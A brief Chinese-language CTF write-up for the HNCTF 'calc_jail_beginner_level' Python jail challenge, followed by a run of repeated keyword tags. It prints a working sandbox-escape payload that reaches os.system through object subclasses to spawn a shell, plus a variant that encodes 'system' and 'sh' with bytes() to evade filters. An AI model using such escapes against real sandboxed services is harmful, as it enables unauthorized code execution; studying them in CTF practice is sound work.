查看附件信息
这里禁用了__import__,直接导致了help()函数和breakpoint()函数没法使用,并且还过滤了关键字符,这里考虑python模板注入,但是这里还过滤chr(),这里可以使用bytes函数
payload如下:().__class__.__base__.__subclasses__()[-4].__init__.__globals__['system']('sh')
用bytes修改:().__class__.__base__.__subclasses__()[-4].__init__.__globals__[bytes([115,121,115,116,101,109]).decode()](bytes([115,104]).decode())
- calc_jail_beginner_level beginner 模板 python HNCTFcalc_jail_beginner_level beginner getshell hnctf calc_jail_beginner_level beginner模板python calc_jail_beginner_level函数beginner hnctf 沙箱calc_jail_beginner_level beginner模板 calc_jail_beginner_level calc_jail_beginner_level breakpoint函数beginner calc_jail_beginner beginner hnctf week1 python2 python环境hnctf hnctf beginner python pyqt5 pyqt